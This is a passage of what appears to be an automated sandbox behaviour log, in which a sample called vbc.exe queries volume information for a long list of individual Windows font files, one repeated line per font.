        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
